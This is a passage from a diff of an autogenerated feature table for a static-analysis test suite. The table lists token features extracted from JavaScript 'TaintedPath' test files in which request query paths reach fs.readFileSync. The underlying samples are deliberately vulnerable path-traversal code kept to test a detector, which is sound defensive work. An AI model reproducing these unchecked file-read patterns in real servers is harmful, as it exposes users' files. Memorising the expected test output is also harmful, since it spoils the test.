fs http path url | | autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | readFil ... path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | readFil ... path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | readFil ... path)) | contextFunctionInterfaces | | @@ -4620,6 +57953,16 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | readFil ... path)) | enclosingFunctionName | createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | readFil ... path)) | fileImports | fs http path url | | autogenerated/TaintedPath/TaintedPath-es6.js:10:13:10:46 | readFil ... path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:29 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:29 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:29 | join | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:29 | join | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:29 | join | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:45 | exceptional return of join("public", path) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:45 | exceptional return of join("public", path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:45 | exceptional return of join("public", path) | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:45 | exceptional return of join("public", path) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:45 | exceptional return of join("public", path) | fileImports | fs http path url | | autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:45 | join("public", path) | CalleeFlexibleAccessPath | readFileSync | | autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:45 | join("public", path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath-es6.js:10:26:10:45 | join("public", path) | calleeImports | fs | @@ -4644,36 +57987,211 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath-es6.js:10:41:10:44 | path | enclosingFunctionBody | req res path parse req url true query path res write readFileSync join public path | | autogenerated/TaintedPath/TaintedPath-es6.js:10:41:10:44 | path | enclosingFunctionName | createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath-es6.js:10:41:10:44 | path | fileImports | fs http path url | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:0 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:0 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | cp | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | cp | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | normalizeUrl | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | normalizeUrl | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | normalizeUrl | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | sanitize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | sanitize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:1:1:1 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:6 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:6 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:22 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:22 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:22 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:22 | fs = require('fs') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:22 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:5:1:22 | fs = require('fs') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:10:1:16 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:10:1:16 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:10:1:22 | exceptional return of require('fs') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:10:1:22 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:10:1:22 | exceptional return of require('fs') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:1:10:1:22 | require('fs') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:1:10:1:22 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:1:10:1:22 | require('fs') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:1:18:1:21 | 'fs' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:1:18:1:21 | 'fs' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:1:18:1:21 | 'fs' | calleeImports | | | autogenerated/TaintedPath/TaintedPath.js:1:18:1:21 | 'fs' | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:1:18:1:21 | 'fs' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:1:18:1:21 | 'fs' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:2:5:2:8 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:2:5:2:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:2:5:2:8 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:2:5:2:26 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:2:5:2:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:2:5:2:26 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:2:5:2:26 | http = ... 'http') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:2:5:2:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:2:5:2:26 | http = ... 'http') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:2:12:2:18 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:2:12:2:18 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:2:12:2:26 | exceptional return of require('http') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:2:12:2:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:2:12:2:26 | exceptional return of require('http') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:2:12:2:26 | require('http') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:2:12:2:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:2:12:2:26 | require('http') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:2:20:2:25 | 'http' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:2:20:2:25 | 'http' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:2:20:2:25 | 'http' | calleeImports | | | autogenerated/TaintedPath/TaintedPath.js:2:20:2:25 | 'http' | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:2:20:2:25 | 'http' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:2:20:2:25 | 'http' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:7 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:7 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:24 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:24 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:24 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:24 | url = require('url') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:24 | url = require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:3:5:3:24 | url = require('url') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:3:11:3:17 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:3:11:3:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:3:11:3:17 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:3:11:3:24 | exceptional return of require('url') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:3:11:3:24 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:3:11:3:24 | exceptional return of require('url') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:3:11:3:24 | require('url') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:3:11:3:24 | require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:3:11:3:24 | require('url') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:3:19:3:23 | 'url' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:3:19:3:23 | 'url' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:3:19:3:23 | 'url' | calleeImports | | | autogenerated/TaintedPath/TaintedPath.js:3:19:3:23 | 'url' | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:3:19:3:23 | 'url' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:3:19:3:23 | 'url' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:12 | sanitize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:12 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:12 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:12 | sanitize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:43 | sanitiz ... ename') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:43 | sanitiz ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:43 | sanitiz ... ename') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:43 | sanitize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:43 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:4:5:4:43 | sanitize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:4:16:4:22 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:4:16:4:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:4:16:4:22 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:4:16:4:43 | exceptional return of require ... ename') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:4:16:4:43 | exceptional return of require ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:4:16:4:43 | exceptional return of require ... ename') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:4:16:4:43 | require ... ename') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:4:16:4:43 | require ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:4:16:4:43 | require ... ename') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:4:24:4:42 | 'sanitize-filename' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:4:24:4:42 | 'sanitize-filename' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:4:24:4:42 | 'sanitize-filename' | calleeImports | | | autogenerated/TaintedPath/TaintedPath.js:4:24:4:42 | 'sanitize-filename' | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:4:24:4:42 | 'sanitize-filename' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:4:24:4:42 | 'sanitize-filename' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:14 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:14 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:14 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:14 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:32 | pathMod ... 'path') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:32 | pathMod ... 'path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:32 | pathMod ... 'path') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:32 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:32 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:5:5:5:32 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:5:18:5:24 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:5:18:5:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:5:18:5:24 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:5:18:5:32 | exceptional return of require('path') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:5:18:5:32 | exceptional return of require('path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:5:18:5:32 | exceptional return of require('path') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:5:18:5:32 | require('path') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:5:18:5:32 | require('path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:5:18:5:32 | require('path') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:5:26:5:31 | 'path' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:5:26:5:31 | 'path' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:5:26:5:31 | 'path' | calleeImports | | | autogenerated/TaintedPath/TaintedPath.js:5:26:5:31 | 'path' | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:5:26:5:31 | 'path' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:5:26:5:31 | 'path' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:5:8:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:5:8:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:5:8:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:5:61:2 | server ... )));\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:5:61:2 | server ... )));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:5:61:2 | server ... )));\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:14:8:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:14:8:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:14:8:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:14:8:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:14:8:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:14:8:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:14:61:2 | exceptional return of http.cr ... )));\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:14:61:2 | exceptional return of http.cr ... )));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:14:61:2 | exceptional return of http.cr ... )));\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:14:61:2 | http.cr ... )));\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:14:61:2 | http.cr ... )));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:14:61:2 | http.cr ... )));\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:19:8:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:19:8:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:19:8:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | sanitize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | sanitize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | sanitize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | sanitize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | this | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res 